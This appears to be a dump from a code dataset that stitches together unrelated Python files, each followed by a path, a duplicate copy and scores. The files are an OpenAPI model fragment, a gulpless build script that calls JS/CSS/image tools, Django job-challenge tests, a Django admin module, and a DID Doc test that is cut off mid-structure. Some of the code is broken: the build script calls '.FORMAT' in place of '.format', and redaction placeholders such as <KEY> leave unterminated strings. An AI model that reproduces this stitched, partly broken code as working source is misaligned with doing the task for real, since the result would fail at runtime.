"file_name": "fileName", # noqa: E501
"flat_part_insertable_id": "flatPartInsertableId", # noqa: E501
"href": "href", # noqa: E501
"id": "id", # noqa: E501
"insertable_id": "insertableId", # noqa: E501
"is_obsolete": "isObsolete", # noqa: E501
"is_translatable": "isTranslatable", # noqa: E501
"mime_type": "mimeType", # noqa: E501
"name": "name", # noqa: E501
"next_revision_id": "nextRevisionId", # noqa: E501
"obsoletion_package_id": "obsoletionPackageId", # noqa: E501
"part_id": "partId", # noqa: E501
"part_number": "partNumber", # noqa: E501
"previous_revision_id": "previousRevisionId", # noqa: E501
"release_created_date": "releaseCreatedDate", # noqa: E501
"release_id": "releaseId", # noqa: E501
"release_name": "releaseName", # noqa: E501
"released_by": "releasedBy", # noqa: E501
"revision": "revision", # noqa: E501
"revision_rule_id": "revisionRuleId", # noqa: E501
"version_id": "versionId", # noqa: E501
"version_name": "versionName", # noqa: E501
"view_ref": "viewRef", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_revision_info.BTRevisionInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
approvers ([bt_revision_approver_info.BTRevisionApproverInfo]): [optional] # noqa: E501
auto_obsoletion_release_id (str): [optional] # noqa: E501
auto_obsoletion_release_name (str): [optional] # noqa: E501
can_current_user_obsolete (bool): [optional] # noqa: E501
can_export (bool): [optional] # noqa: E501
company_id (str): [optional] # noqa: E501
configuration (str): [optional] # noqa: E501
document_id (str): [optional] # noqa: E501
document_name (str): [optional] # noqa: E501
element_id (str): [optional] # noqa: E501
element_type (int): [optional] # noqa: E501
error_message (str): [optional] # noqa: E501
file_name (str): [optional] # noqa: E501
flat_part_insertable_id (str): [optional] # noqa: E501
href (str): [optional] # noqa: E501
id (str): [optional] # noqa: E501
insertable_id (str): [optional] # noqa: E501
is_obsolete (bool): [optional] # noqa: E501
is_translatable (bool): [optional] # noqa: E501
mime_type (str): [optional] # noqa: E501
name (str): [optional] # noqa: E501
next_revision_id (str): [optional] # noqa: E501
obsoletion_package_id (str): [optional] # noqa: E501
part_id (str): [optional] # noqa: E501
part_number (str): [optional] # noqa: E501
previous_revision_id (str): [optional] # noqa: E501
release_created_date (datetime): [optional] # noqa: E501
release_id (str): [optional] # noqa: E501
release_name (str): [optional] # noqa: E501
released_by (bt_user_summary_info.BTUserSummaryInfo): [optional] # noqa: E501
revision (str): [optional] # noqa: E501
revision_rule_id (str): [optional] # noqa: E501
version_id (str): [optional] # noqa: E501
version_name (str): [optional] # noqa: E501
view_ref (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value) | 0.474388 | 0.153613 |
from __future__ import absolute_import, unicode_literals, division
import subprocess
import gulpless
import logging
import shutil
import re
import os
UGLIFY = "uglifyjs"
TSC = "tsc"
LESSC = "lessc"
AUTOPREFIXER = "autoprefixer"
IMAGEMIN = "imagemin"
if os.name != "posix":
UGLIFY += ".cmd"
TSC += ".cmd"
LESSC += ".cmd"
AUTOPREFIXER += ".cmd"
IMAGEMIN += ".cmd"
class JavascriptHandler(gulpless.TreeHandler):
include = re.compile("///.*?<reference\s+path=[\"\'](.*)[\"\']\s*/>", re.I)
def __init__(self, patterns, ignore_patterns=None):
super(JavascriptHandler, self).__init__(patterns, ignore_patterns,
["", ".gz", ".map", ".map.gz"])
def build(self, input_path, output_paths):
js, js_gz, smap, smap_gz = output_paths
# concatenate and minify
imports = set()
cmdline = [UGLIFY]
current = os.path.dirname(input_path)
for line in open(input_path):
match = self.include.search(line)
if match:
path = os.path.normcase(os.path.normpath(
os.path.join(current, match.group(1))))
if path in imports:
logging.warning("Skipping duplicate import for '{0}' in "
"'{1}'".format(path, input_path))
else:
imports.add(path)
cmdline.append(path.replace(os.sep, "/"))
if len(cmdline) == 1:
raise EnvironmentError("Nothing to build")
cmdline += ["--source-map", smap,
"--source-map-url", os.path.basename(smap),
"--source-map-include-sources",
"--prefix", str(input_path.count(os.sep)),
"--compress", "warnings=false,drop_debugger=false",
"--mangle"]
try:
if subprocess.call(cmdline, stdout=open(js, "wb")) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(UGLIFY))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g uglify-js` ?".format(UGLIFY))
# gzip
gulpless.gzip(js, js_gz, 6)
gulpless.gzip(smap, smap_gz, 6)
class TypescriptHandler(gulpless.TreeHandler):
def __init__(self, patterns, ignore_patterns=None):
super(TypescriptHandler, self).__init__(patterns, ignore_patterns,
["", ".gz", ".map", ".map.gz"])
def _outputs(self, src, path):
return super(TypescriptHandler, self)._outputs(src, path[:-2] + "js")
def build(self, input_path, output_paths):
js, js_gz, smap, smap_gz = output_paths
# compile
cmdline = [TSC, input_path,
"--out", js,
"--sourcemap",
"--sourceRoot", "."]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in {0}".format(TSC))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run "
"`npm install -g typescript` ?".format(TSC))
# uglify
cmdline = [UGLIFY, js,
"--in-source-map", smap,
"--source-map", smap,
"--source-map-url", os.path.basename(smap),
"--source-map-include-sources",
"--prefix", "relative",
"--compress", "warnings=false,drop_debugger=false",
"--mangle",
"--output", js]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(UGLIFY))
except EnvironmentError:
raise EnvironmentError("Unable to run {0}. Did you run `npm "
"install -g uglify-js` ?".format(UGLIFY))
# gzip
gulpless.gzip(js, js_gz, 6)
gulpless.gzip(smap, smap_gz, 6)
class LessHandler(gulpless.TreeHandler):
def __init__(self, patterns, ignore_patterns=None):
super(LessHandler, self).__init__(patterns, ignore_patterns,
["", ".gz", ".map", ".map.gz"])
def _outputs(self, src, path):
return super(LessHandler, self)._outputs(src, path[:-4] + "css")
def build(self, input_path, output_paths):
css, css_gz, smap, smap_gz = output_paths
# compile
cmdline = [LESSC,
"--source-map={0}".format(smap),
"--source-map-url={0}".format(os.path.basename(smap)),
"--source-map-less-inline",
"--compress",
input_path,
css]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(LESSC))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g less` ?".format(LESSC))
# autoprefix
cmdline = [AUTOPREFIXER,
css,
"--map",
"--no-cascade",
"--output", css]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(AUTOPREFIXER))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g autoprefixer` "
"?".format(AUTOPREFIXER))
# gzip
gulpless.gzip(css, css_gz, 6)
gulpless.gzip(smap, smap_gz, 6)
class StaticHandler(gulpless.Handler):
def __init__(self, patterns, ignore_patterns=None):
super(StaticHandler, self).__init__(patterns, ignore_patterns,
["", ".gz"])
def build(self, input_path, output_paths):
output_path, gzip_path = output_paths
shutil.copy(input_path, output_path)
gulpless.gzip(input_path, gzip_path)
class ImageHandler(gulpless.Handler):
def __init__(self, patterns, ignore_patterns=None):
super(ImageHandler, self).__init__(patterns, ignore_patterns)
def build(self, input_path, output_paths):
output_path, = output_paths
# minify
cmdline = [IMAGEMIN, input_path,
"--interlaced",
"--optimizationLevel", "3",
"--progressive"]
try:
if subprocess.call(cmdline, stdout=open(output_path, "wb")) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(IMAGEMIN))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g imagemin` ?".FORMAT(IMAGEMIN))
# project configuration
SRC = "resources/"
DEST = "static/"
HANDLERS = [
JavascriptHandler(["js/*.js"]),
TypescriptHandler(["js/*.ts"], ["js/*.d.ts"]),
LessHandler(["css/*.less"], ["*bootstrap/*.less"]),
StaticHandler(["fonts/*", "crossdomain.xml", "respond-*"]),
ImageHandler(["img/*"])
] | examples/build.py | from __future__ import absolute_import, unicode_literals, division
import subprocess
import gulpless
import logging
import shutil
import re
import os
UGLIFY = "uglifyjs"
TSC = "tsc"
LESSC = "lessc"
AUTOPREFIXER = "autoprefixer"
IMAGEMIN = "imagemin"
if os.name != "posix":
UGLIFY += ".cmd"
TSC += ".cmd"
LESSC += ".cmd"
AUTOPREFIXER += ".cmd"
IMAGEMIN += ".cmd"
class JavascriptHandler(gulpless.TreeHandler):
include = re.compile("///.*?<reference\s+path=[\"\'](.*)[\"\']\s*/>", re.I)
def __init__(self, patterns, ignore_patterns=None):
super(JavascriptHandler, self).__init__(patterns, ignore_patterns,
["", ".gz", ".map", ".map.gz"])
def build(self, input_path, output_paths):
js, js_gz, smap, smap_gz = output_paths
# concatenate and minify
imports = set()
cmdline = [UGLIFY]
current = os.path.dirname(input_path)
for line in open(input_path):
match = self.include.search(line)
if match:
path = os.path.normcase(os.path.normpath(
os.path.join(current, match.group(1))))
if path in imports:
logging.warning("Skipping duplicate import for '{0}' in "
"'{1}'".format(path, input_path))
else:
imports.add(path)
cmdline.append(path.replace(os.sep, "/"))
if len(cmdline) == 1:
raise EnvironmentError("Nothing to build")
cmdline += ["--source-map", smap,
"--source-map-url", os.path.basename(smap),
"--source-map-include-sources",
"--prefix", str(input_path.count(os.sep)),
"--compress", "warnings=false,drop_debugger=false",
"--mangle"]
try:
if subprocess.call(cmdline, stdout=open(js, "wb")) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(UGLIFY))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g uglify-js` ?".format(UGLIFY))
# gzip
gulpless.gzip(js, js_gz, 6)
gulpless.gzip(smap, smap_gz, 6)
class TypescriptHandler(gulpless.TreeHandler):
def __init__(self, patterns, ignore_patterns=None):
super(TypescriptHandler, self).__init__(patterns, ignore_patterns,
["", ".gz", ".map", ".map.gz"])
def _outputs(self, src, path):
return super(TypescriptHandler, self)._outputs(src, path[:-2] + "js")
def build(self, input_path, output_paths):
js, js_gz, smap, smap_gz = output_paths
# compile
cmdline = [TSC, input_path,
"--out", js,
"--sourcemap",
"--sourceRoot", "."]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in {0}".format(TSC))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run "
"`npm install -g typescript` ?".format(TSC))
# uglify
cmdline = [UGLIFY, js,
"--in-source-map", smap,
"--source-map", smap,
"--source-map-url", os.path.basename(smap),
"--source-map-include-sources",
"--prefix", "relative",
"--compress", "warnings=false,drop_debugger=false",
"--mangle",
"--output", js]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(UGLIFY))
except EnvironmentError:
raise EnvironmentError("Unable to run {0}. Did you run `npm "
"install -g uglify-js` ?".format(UGLIFY))
# gzip
gulpless.gzip(js, js_gz, 6)
gulpless.gzip(smap, smap_gz, 6)
class LessHandler(gulpless.TreeHandler):
def __init__(self, patterns, ignore_patterns=None):
super(LessHandler, self).__init__(patterns, ignore_patterns,
["", ".gz", ".map", ".map.gz"])
def _outputs(self, src, path):
return super(LessHandler, self)._outputs(src, path[:-4] + "css")
def build(self, input_path, output_paths):
css, css_gz, smap, smap_gz = output_paths
# compile
cmdline = [LESSC,
"--source-map={0}".format(smap),
"--source-map-url={0}".format(os.path.basename(smap)),
"--source-map-less-inline",
"--compress",
input_path,
css]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(LESSC))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g less` ?".format(LESSC))
# autoprefix
cmdline = [AUTOPREFIXER,
css,
"--map",
"--no-cascade",
"--output", css]
try:
if subprocess.call(cmdline) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(AUTOPREFIXER))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g autoprefixer` "
"?".format(AUTOPREFIXER))
# gzip
gulpless.gzip(css, css_gz, 6)
gulpless.gzip(smap, smap_gz, 6)
class StaticHandler(gulpless.Handler):
def __init__(self, patterns, ignore_patterns=None):
super(StaticHandler, self).__init__(patterns, ignore_patterns,
["", ".gz"])
def build(self, input_path, output_paths):
output_path, gzip_path = output_paths
shutil.copy(input_path, output_path)
gulpless.gzip(input_path, gzip_path)
class ImageHandler(gulpless.Handler):
def __init__(self, patterns, ignore_patterns=None):
super(ImageHandler, self).__init__(patterns, ignore_patterns)
def build(self, input_path, output_paths):
output_path, = output_paths
# minify
cmdline = [IMAGEMIN, input_path,
"--interlaced",
"--optimizationLevel", "3",
"--progressive"]
try:
if subprocess.call(cmdline, stdout=open(output_path, "wb")) != 0:
raise EnvironmentError("Non-zero exit code in "
"{0}".format(IMAGEMIN))
except EnvironmentError:
raise EnvironmentError("Unable to start {0}. Did you run `npm "
"install -g imagemin` ?".FORMAT(IMAGEMIN))
# project configuration
SRC = "resources/"
DEST = "static/"
HANDLERS = [
JavascriptHandler(["js/*.js"]),
TypescriptHandler(["js/*.ts"], ["js/*.d.ts"]),
LessHandler(["css/*.less"], ["*bootstrap/*.less"]),
StaticHandler(["fonts/*", "crossdomain.xml", "respond-*"]),
ImageHandler(["img/*"])
] | 0.401101 | 0.113432 |
from unittest.mock import patch
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.test import Client, TestCase
from django.urls import resolve, reverse
from model_bakery import baker as mommy
import responses
from pyjobs.core.models import Job, Profile, JobApplication
from pyjobs.core.views import index
import datetime
class TestingRestrictedViews(TestCase):
@responses.activate
@patch("pyjobs.marketing.triggers.send_group_notification")
@patch("pyjobs.marketing.triggers.send_job_to_github_issues")
@patch("pyjobs.marketing.triggers.post_telegram_channel")
def setUp(
self, _mocked_send_group_push, _mock_github, _mocked_post_telegram_channel
):
self.job = mommy.make(
"core.Job", is_challenging=True, challenge="Ola mundo dos testes"
)
self.user = User.objects.create_user(
username="jacob", email="<EMAIL>", password="<PASSWORD>"
)
self.profile = Profile.objects.create(
user=self.user,
github="http://www.github.com/foobar",
linkedin="http://www.linkedin.com/in/foobar",
portfolio="http://www.foobar.com/",
cellphone="11981435390",
)
self.client = Client()
self.client.login(username="jacob", password="<PASSWORD>")
def test_if_user_is_not_applied_to_job(self):
response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
self.assertEqual(200, response.status_code)
self.assertTrue(b"Candidate-se para esta vaga pelo" in response.content)
def test_if_applied_user_can_get_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
)
response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
self.assertEqual(200, response.status_code)
self.assertTrue(b"Clique aqui e preencha o desafio" in response.content)
def test_if_applied_user_can_answer_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
)
response = self.client.get(
"/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
)
def test_if_applied_user_cant_answer_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
challenge_response_at=datetime.datetime.now(),
challenge_response_link="http://www.google.com",
)
response = self.client.get(
"/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
)
self.assertEqual(200, response.status_code)
self.assertTrue(
bytes("Recebemos seu teste, aguarde nosso retorno!", "utf8")
in response.content
) | pyjobs/core/tests/test_job_challenge.py | from unittest.mock import patch
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.test import Client, TestCase
from django.urls import resolve, reverse
from model_bakery import baker as mommy
import responses
from pyjobs.core.models import Job, Profile, JobApplication
from pyjobs.core.views import index
import datetime
class TestingRestrictedViews(TestCase):
@responses.activate
@patch("pyjobs.marketing.triggers.send_group_notification")
@patch("pyjobs.marketing.triggers.send_job_to_github_issues")
@patch("pyjobs.marketing.triggers.post_telegram_channel")
def setUp(
self, _mocked_send_group_push, _mock_github, _mocked_post_telegram_channel
):
self.job = mommy.make(
"core.Job", is_challenging=True, challenge="Ola mundo dos testes"
)
self.user = User.objects.create_user(
username="jacob", email="<EMAIL>", password="<PASSWORD>"
)
self.profile = Profile.objects.create(
user=self.user,
github="http://www.github.com/foobar",
linkedin="http://www.linkedin.com/in/foobar",
portfolio="http://www.foobar.com/",
cellphone="11981435390",
)
self.client = Client()
self.client.login(username="jacob", password="<PASSWORD>")
def test_if_user_is_not_applied_to_job(self):
response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
self.assertEqual(200, response.status_code)
self.assertTrue(b"Candidate-se para esta vaga pelo" in response.content)
def test_if_applied_user_can_get_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
)
response = self.client.get("/job/{}".format(self.job.unique_slug), follow=True)
self.assertEqual(200, response.status_code)
self.assertTrue(b"Clique aqui e preencha o desafio" in response.content)
def test_if_applied_user_can_answer_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
)
response = self.client.get(
"/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
)
def test_if_applied_user_cant_answer_job_challenge(self):
self.job_application = JobApplication.objects.create(
job=self.job,
user=self.user,
email_sent=True,
email_sent_at=datetime.datetime.now(),
challenge_response_at=datetime.datetime.now(),
challenge_response_link="http://www.google.com",
)
response = self.client.get(
"/job/{}/challenge_submit/".format(self.job.unique_slug), follow=True
)
self.assertEqual(200, response.status_code)
self.assertTrue(
bytes("Recebemos seu teste, aguarde nosso retorno!", "utf8")
in response.content
) | 0.400632 | 0.195729 |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext_lazy as _
from accounts.models import User, UserSetting, UserProfile, UserSchool, UserLicense, UserEmployer, UserCertification
class CustomUserAdmin(UserAdmin):
list_display = ("id", "email", "username", "created", "modified")
list_filter = ("is_active", "is_staff", "groups")
search_fields = ("email", "username")
ordering = ("email",)
filter_horizontal = (
"groups",
"user_permissions",
)
fieldsets = (
(None, {"fields": ("email", "username", "password")}),
(
_("Permissions"),
{"fields": ("is_active", "is_staff", "is_superuser", "groups", "user_permissions")},
),
)
add_fieldsets = ((None, {"classes": ("wide",), "fields": ("email", "username", "<PASSWORD>", "<PASSWORD>")}),)
class UserSettingAdmin(admin.ModelAdmin):
list_display = ("id", "user")
search_fields = ("user__username", "user__email")
ordering = ("user__email",)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ("id", "user")
search_fields = ("user__username", "user__email")
ordering = ("user__email",)
class UserCertificationAdmin(admin.ModelAdmin):
list_display = ("id", "institution_name", "certificate_program", "certificate_number")
search_fields = ("user__username", "user__email", "institution_name", "certificate_program", "certificate_number")
ordering = ("certificate_program",)
class UserEmployerAdmin(admin.ModelAdmin):
list_display = ("id", "employer_name", "position", "current_position")
list_filter = ("current_position",)
search_fields = ("user__username", "user__email", "position", "current_position")
ordering = ("employer_name",)
class UserLicenseAdmin(admin.ModelAdmin):
list_display = ("id", "issuing_authority", "license_type", "license_number")
list_filter = ("completion_date", "expiration_date",)
search_fields = ("user__username", "user__email", "issuing_authority", "license_type", "license_number")
ordering = ("license_type",)
class UserSchoolAdmin(admin.ModelAdmin):
list_display = ("id", "school_name", "program", "degree_type", "current_student")
list_filter = ("current_student", "degree_type", "start_date", "graduate_date",)
search_fields = ("user__username", "user__email", "school_name", "program", "degree_type", "current_student")
ordering = ("school_name", "program")
admin.site.register(User, CustomUserAdmin)
admin.site.register(UserSetting, UserSettingAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(UserSchool, UserSchoolAdmin)
admin.site.register(UserLicense, UserLicenseAdmin)
admin.site.register(UserEmployer, UserEmployerAdmin)
admin.site.register(UserCertification, UserCertificationAdmin) | backend/accounts/admin.py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext_lazy as _
from accounts.models import User, UserSetting, UserProfile, UserSchool, UserLicense, UserEmployer, UserCertification
class CustomUserAdmin(UserAdmin):
list_display = ("id", "email", "username", "created", "modified")
list_filter = ("is_active", "is_staff", "groups")
search_fields = ("email", "username")
ordering = ("email",)
filter_horizontal = (
"groups",
"user_permissions",
)
fieldsets = (
(None, {"fields": ("email", "username", "password")}),
(
_("Permissions"),
{"fields": ("is_active", "is_staff", "is_superuser", "groups", "user_permissions")},
),
)
add_fieldsets = ((None, {"classes": ("wide",), "fields": ("email", "username", "<PASSWORD>", "<PASSWORD>")}),)
class UserSettingAdmin(admin.ModelAdmin):
list_display = ("id", "user")
search_fields = ("user__username", "user__email")
ordering = ("user__email",)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ("id", "user")
search_fields = ("user__username", "user__email")
ordering = ("user__email",)
class UserCertificationAdmin(admin.ModelAdmin):
list_display = ("id", "institution_name", "certificate_program", "certificate_number")
search_fields = ("user__username", "user__email", "institution_name", "certificate_program", "certificate_number")
ordering = ("certificate_program",)
class UserEmployerAdmin(admin.ModelAdmin):
list_display = ("id", "employer_name", "position", "current_position")
list_filter = ("current_position",)
search_fields = ("user__username", "user__email", "position", "current_position")
ordering = ("employer_name",)
class UserLicenseAdmin(admin.ModelAdmin):
list_display = ("id", "issuing_authority", "license_type", "license_number")
list_filter = ("completion_date", "expiration_date",)
search_fields = ("user__username", "user__email", "issuing_authority", "license_type", "license_number")
ordering = ("license_type",)
class UserSchoolAdmin(admin.ModelAdmin):
list_display = ("id", "school_name", "program", "degree_type", "current_student")
list_filter = ("current_student", "degree_type", "start_date", "graduate_date",)
search_fields = ("user__username", "user__email", "school_name", "program", "degree_type", "current_student")
ordering = ("school_name", "program")
admin.site.register(User, CustomUserAdmin)
admin.site.register(UserSetting, UserSettingAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(UserSchool, UserSchoolAdmin)
admin.site.register(UserLicense, UserLicenseAdmin)
admin.site.register(UserEmployer, UserEmployerAdmin)
admin.site.register(UserCertification, UserCertificationAdmin) | 0.289372 | 0.1273 |
import json
import pytest
from von_anchor.a2a.diddoc import DIDDoc
from von_anchor.error import AbsentDIDDocItem
from von_anchor.frill import Ink, ppjson
@pytest.mark.asyncio
async def test_a2a():
print(Ink.YELLOW('\n\n== Testing DID Doc wranglers =='))
# One authn key by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': '4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
},
{
'id': '6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4'
}
],
'service': [
{
'id': '0',
'type': 'Agency',
'serviceEndpoint': 'did:sov:Q4zqM7aXqm7gDQkUVLng9h'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 1 == DID Doc on abbreviated identifiers: {}'.format(ppjson(dd_out)))
# One authn key embedded, all possible refs canonical
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': '<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'Agency',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 2 == DID Doc on mixed reference styles, embedded and ref style authn keys: {}'.format(ppjson(dd_out)))
# All references canonical where possible; one authn key embedded and one by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'DidMessaging',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 3 == DID Doc on canonical refs: {}'.format(ppjson(dd_out)))
# Minimal as per indy-agent test suite without explicit identifiers
dd_in = {
'@context': 'https://w3id.org/did/v1',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'type': 'DidMessaging',
'recipientKeys': ['~<KEY>'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 4 == DID Doc miminal style, implcit DID document identifier: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': ['~YYYYYYYYYYYYYYYY'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 5 == DID Doc miminal style plus explicit idents and novel raw base58 service recip key: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
},
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-2',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': '~<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 0,
